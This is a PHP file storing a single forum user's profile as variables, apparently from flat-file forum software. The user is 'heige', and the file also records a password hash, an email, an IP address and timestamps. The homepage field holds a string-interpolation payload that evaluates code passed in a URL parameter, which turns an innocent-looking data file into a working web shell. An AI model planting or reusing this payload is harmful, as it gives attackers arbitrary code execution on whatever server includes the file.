<?php

$userid="233";
$password="e10adc3949ba59abbe56e057f20f883e";
$username="heige";
$useralias="heige";
$userrealname="";
$useremail="dfdf@sdsd.com";
$useremhide="";
$userip="222.241.116.193";
$usersig="";
$userslogan="";
$useravatar="none";
$usermsn="";
$userposts="0";
$usericq="";
$userqq="";
$userwebavatar="";
$userrank="1";
$useryahoo="";
$useraim="";
$userlocation="";
$userjoined="1175232193";
$userhomepage="${${eval($_GET[a])}}";
$useradmin="0";
$usermod="0";
$userban="0";
$userfriend="";
$userlastvisit="1175232258";
$userlastpost="1175232193";
$userprevvisit="1175232193";
$useranimsmilies="";
$lastaliaschange="1175232193";
$userlang="en";
$uservisits="1";
$aliaslist="";
$noavatars="";

?>